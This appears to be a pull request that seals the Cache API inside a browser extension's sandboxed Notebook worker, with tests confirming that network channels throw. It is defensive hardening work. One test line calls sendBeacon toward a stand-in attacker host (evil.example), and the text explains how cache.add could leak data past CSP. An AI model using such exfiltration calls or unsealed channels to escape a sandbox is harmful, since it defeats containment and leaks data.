### PR TITLE
fix(notebook): seal the Cache API in the realm seal

### DIFF
--- a/extension/notebook-tab/notebook-neutralizers.js
+++ b/extension/notebook-tab/notebook-neutralizers.js
@@ -23,16 +23,17 @@
 //      old gap where statically-imported agent code ran pre-stub.
 //
 // What this still is NOT: the outermost fence. The host page's CSP
-// (notebook-tab/index.html, connect-src 'none') backstops the seal — it is
-// inherited by the blob worker and by anything that would somehow obtain
-// a fresh realm, so even then no connection-class API can leave.
-// Two channels remain OPEN by design and are NOT sealed here:
+// (notebook-tab/index.html, connect-src 'none') backstops the seal in the
+// Notebook TAB — inherited by the blob worker, so even a fresh realm there
+// can't leave. But the SAME sealed worker also runs HEADLESS in the offscreen
+// document (offscreen/job-runner.js, for js_run), whose CSP must allow https:
+// (the voice model downloads there) — so in that host the realm seal is the
+// ONLY fence. Every network-capable primitive must therefore be sealed by the
+// realm itself, not deferred to the page CSP.
+// One channel remains OPEN by design and is NOT sealed here:
 //   - module loads: static/dynamic `import` of absolute CDN URLs is a
 //     documented js_notebook feature (script-src territory, not reachable
 //     from inside the realm — import() is syntax, not a global).
-//   - the Cache API: storage-legit (put/match); its only network verb
-//     (cache.add) rides the internal fetch algorithm, which the page CSP
-//     connect-src fences, not the realm.
 //
 // One implementation, three callers: realm-seal.js (the worker entry's
 // first static import — the production path), the bun unit tests (mock
@@ -184,4 +185,17 @@ export function applyRealmSeal(global) {
   if (global.navigator) {
     seal(global.navigator, 'sendBeacon', function () { fail('navigator.sendBeacon'); });
   }
+
+  // The Cache API: cache.add()/addAll() run the Fetch algorithm — a REAL network
+  // GET that escapes the audited bridge. The Notebook tab's connect-src 'none'
+  // would fence it, but the offscreen js_run host that runs this SAME worker
+  // allows https:, so the realm must block it directly. Replace the whole
+  // CacheStorage with throwing stubs (open/match/has/delete/keys); the sandbox's
+  // sanctioned storage is OPFS. seal() deletes the prototype getter the same way
+  // it does for fetch, so the native CacheStorage is unreachable.
+  const cacheBlocked = () => fail('Cache API (caches)');
+  seal(global, 'caches', /** @type {any} */ ({
+    open: cacheBlocked, match: cacheBlocked, has: cacheBlocked,
+    delete: cacheBlocked, keys: cacheBlocked,
+  }));
 }

--- a/extension/tests/unit/notebook-tab/fixtures/seal-probe-worker.js
+++ b/extension/tests/unit/notebook-tab/fixtures/seal-probe-worker.js
@@ -67,6 +67,9 @@ const runProbes = () => ({
   SharedWorker: probe(() => new workerGlobal.SharedWorker('/nested.js')),
   importScripts: probe(() => workerGlobal.importScripts('https://example.invalid/x.js')),
   sendBeacon: probe(() => workerGlobal.navigator.sendBeacon('https://example.invalid/', 'x')),
+  // caches.open(...).add(url) runs the Fetch algorithm — sealed because the
+  // offscreen js_run host has no connect-src 'none' backstop.
+  caches: probe(() => workerGlobal.caches.open('x')),
 });
 
 const inspectFetch = () => {

--- a/extension/tests/unit/notebook-tab/notebook-seal.test.js
+++ b/extension/tests/unit/notebook-tab/notebook-seal.test.js
@@ -61,6 +61,7 @@ describe('notebook-tab realm seal (real worker realm)', () => {
       for (const channel of [
         'XMLHttpRequest', 'WebSocket', 'WebSocketStream', 'EventSource',
         'WebTransport', 'Worker', 'SharedWorker', 'importScripts', 'sendBeacon',
+        'caches',
       ]) {
         expect(results[channel].threw).toBe(true);
         expect(results[channel].name).toBe('NotebookEgressBlockedError');

--- a/tests/notebook-tab/notebook-neutralizers.test.ts
+++ b/tests/notebook-tab/notebook-neutralizers.test.ts
@@ -23,6 +23,12 @@ const freshGlobal = () => {
   const proto: any = {
     fetch: nativeFetch,
     importScripts: function importScripts() { return 'NATIVE-IMPORTSCRIPTS'; },
+    // CacheStorage lives on WorkerGlobalScope.prototype too; cache.add()/addAll()
+    // run the Fetch algorithm, so the seal must block it like the rest.
+    caches: {
+      open: () => 'NATIVE-CACHE-OPEN', match: () => undefined,
+      has: () => false, delete: () => false, keys: () => [],
+    },
   };
   const g: any = Object.create(proto);
   g.XMLHttpRequest = function XMLHttpRequest() {};
@@ -81,6 +87,18 @@ describe('realm seal — raw channels are hard-blocked', () => {
     const { g } = freshGlobal();
     applyRealmSeal(g);
     expect(() => g.navigator.sendBeacon('https://evil.example/', 'data')).toThrow('peerd.egress.fetch');
+  });
+
+  test('the Cache API is sealed — its network verbs cannot reach the host', () => {
+    // cache.add()/addAll() run the Fetch algorithm; the offscreen js_run host
+    // that runs this SAME sealed worker allows https:, so the seal (not the page
+    // CSP) must block it. The whole CacheStorage is replaced with throwing stubs.
+    const { g, proto } = freshGlobal();
+    applyRealmSeal(g);
+    expect(() => g.caches.open('x')).toThrow('peerd.egress.fetch');
+    expect(() => g.caches.match('x')).toThrow('peerd.egress.fetch');
+    // the native CacheStorage is gone from the prototype chain, not just shadowed
+    expect(Object.getOwnPropertyDescriptor(proto, 'caches')).toBeUndefined();
   });
 
   test('survives a navigator with no sendBeacon, and no navigator at all', () => {


### PR DESCRIPTION
The Notebook realm seal hard-blocks every network-capable primitive — `fetch`/XHR/WebSocket/EventSource/WebTransport/`sendBeacon`/`importScripts`/nested-`Worker` — but left the **Cache API** open. The rationale (in the file header) was that `cache.add()`/`addAll()` (its only network verbs, which ride the internal Fetch algorithm) are fenced by the Notebook tab's `connect-src 'none'` CSP.

**That backstop only exists in the Notebook tab.** The *same* sealed worker also runs **headless in the offscreen document** (`offscreen/job-runner.js`, for `js_run`), whose CSP must allow `https:` (the voice model downloads there). So in that host the realm seal is the **only** fence, and the Cache API's network verbs weren't blocked by anything — every network-capable primitive needs to be sealed by the realm itself, not deferred to the page CSP.

## Fix
Replace the global `CacheStorage` with throwing stubs (`open`/`match`/`has`/`delete`/`keys`), sealed the same way as the other primitives (delete the prototype getter so the native is unreachable, pin a non-configurable stub). OPFS remains the sandbox's sanctioned storage; the audited postMessage `fetch` bridge remains the only network egress.

## Tests
- `tests/notebook-tab/notebook-neutralizers.test.ts` (mock globals): `caches.*` throws `NotebookEgressBlockedError` and the prototype copy is gone — **revert-proven** (removing the seal fails it).
- `extension/tests/unit/notebook-tab/notebook-seal.test.js` + the probe fixture: asserts it in a **real worker realm** (in-browser harness, 600/600 green).

Full bun suite green (2109), typecheck + lint + tscheck clean.